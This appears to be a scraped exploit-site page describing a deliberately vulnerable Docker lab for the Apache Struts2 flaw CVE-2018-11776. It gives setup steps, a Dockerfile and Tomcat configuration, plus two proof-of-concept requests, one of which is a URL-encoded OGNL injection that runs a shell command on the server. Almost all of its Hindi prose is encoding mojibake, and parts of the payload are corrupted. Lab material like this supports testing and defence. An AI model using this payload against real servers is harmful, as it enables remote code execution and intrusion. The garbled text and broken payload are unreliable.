## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BHDRESH-CVE-2018-11776
## CVE-2018-11776 рдХреЗ рд▓рд┐рдП рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рдбреЙрдХрд░ рдХрдВрдЯреЗрдирд░
root@kitploit:~
# docker pull bhdresh/cve-2018-11776:1.0
# docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:1.0
### рдкреНрд░рдорд╛рдг-рдЕрд╡рдзрд╛рд░рдгрд╛
##### рдкреНрд░рдорд╛рдг-рдЕрд╡рдзрд╛рд░рдгрд╛ - 1
root@kitploit:~
Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/${333+333}/help.action
Result : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/666/help.action
##### рдкреНрд░рдорд╛рдг-рдЕрд╡рдзрд╛рд░рдгрд╛ - 2
root@kitploit:~
Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%some-email@example.com@getRuntime%28%29.exec%28%27touch /tmp/vulnerable%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%some-email@example.com@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action
Result : рдЗрд╕рд╕реЗ рдбреЙрдХрд░ рдХреЗ /tmp/ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ 'vulnerable' рдирд╛рдордХ рдлрд╝рд╛рдЗрд▓ рдмрдиреЗрдЧреА
## рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рдбреЙрдХрд░ рдХрдВрдЯреЗрдирд░ рдмрдирд╛рдиреЗ рдХреЗ рдХрджрдо
##### Dockerfile рдмрдирд╛рдПрдБ
root@kitploit:~
FROM ubuntu:latest
RUN apt-get update -y
RUN apt-get upgrade -y
RUN apt-get dist-upgrade -y
RUN apt-get install default-jdk vim net-tools wget -y
EXPOSE 8080
##### рдбреЙрдХрд░ рдмрд┐рд▓реНрдб рдХрд░реЗрдВ
root@kitploit:~
# docker build -t cve-2018-11776 .
##### рдбреЙрдХрд░ рд╢реБрд░реВ рдХрд░реЗрдВ
root@kitploit:~
# docker run --name cve-2018-11776 -p <IP ADDRESS>:8080:8080 -dit cve-2018-11776 /bin/bash
##### рдбреЙрдХрд░ рдореЗрдВ рд▓реЙрдЧрд┐рди рдХрд░реЗрдВ
root@kitploit:~
# docker exec -it cve-2018-11776 /bin/bash
##### рдбреЙрдХрд░ рдХреЗ рдЕрдВрджрд░ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдмрджрд▓рд╛рд╡ рдХрд░реЗрдВ
###### Tomcat рд╕реЗрдЯ рдЕрдк рдХрд░реЗрдВ:
root@kitploit:~
# mkdir ~/sources
# cd ~/sources
# wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
# tar xvzf apache-tomcat-7.0.90.tar.gz
# mv apache-tomcat-7.0.90 /opt/tomcat
###### bashrc рдХреЛ рдЪрд░ рдХреЗ рд╕рд╛рде рдЕрдкрдбреЗрдЯ рдХрд░реЗрдВ:
root@kitploit:~
# vim ~/.bashrc
export JAVA_HOME=/usr/lib/jvm/default-java
export CATALINA_HOME=/opt/tomcat
# . ~/.bashrc
###### Tomcat GUI рдореЗрдВ рдПрдХ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЬреЛрдбрд╝реЗрдВ:
root@kitploit:~
# vim /opt/tomcat/conf/tomcat-users.xml
<user username="username" password="test-cve-2018-11776" roles="manager-gui,admin-gui" />
###### Tomcat рд╕рд░реНрд╡рд░ рд╢реБрд░реВ рдХрд░реЗрдВ
root@kitploit:~
# $CATALINA_HOME/bin/startup.sh
###### Tomcat UI рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд Struts2 Showcase рдЕрдкрд▓реЛрдб рдФрд░ рддреИрдирд╛рдд рдХрд░реЗрдВ
root@kitploit:~
http://<IP ADDRESS>:8080 (username:test-cve-2018-11776)
###### Tomcat рдкреБрдирд░рд╛рд░рдВрдн рдХрд░реЗрдВ
root@kitploit:~
# $CATALINA_HOME/bin/shutdown.sh
# $CATALINA_HOME/bin/startup.sh
###### рдиреЗрдорд╕реНрдкреЗрд╕ рдХреЗ рдмрд┐рдирд╛ рдПрдХ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рд░реАрдбрд╛рдпрд░реЗрдХреНрд╢рди рдХреНрд░рд┐рдпрд╛ рдЬреЛрдбрд╝реЗрдВ:
root@kitploit:~
# vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml
<action name="help">
<result type="redirectAction">
<param name="actionName">date.action</param>
</result>
</action>
рдиреЛрдЯ: рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ, alwaysSelectFullNamespace рдХреЛ True рдкрд░ рд╕реЗрдЯ рдХрд┐рдпрд╛ рдЬрд╛рдирд╛ рдЪрд╛рд╣рд┐рдПред
###### Tomcat рдкреБрдирд░рд╛рд░рдВрдн рдХрд░реЗрдВ рдФрд░ Struts2 Showcase рдкреГрд╖реНрда рджреЗрдЦреЗрдВ:
root@kitploit:~
# $CATALINA_HOME/bin/shutdown.sh
# $CATALINA_HOME/bin/startup.sh
http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/showcase.jsp
### рд▓реЗрдЦрдХ
@bhdresh
### рд╕рдВрджрд░реНрдн
https://github.com/xfox64x/CVE-2018-11776
https://github.com/jas502n/St2-057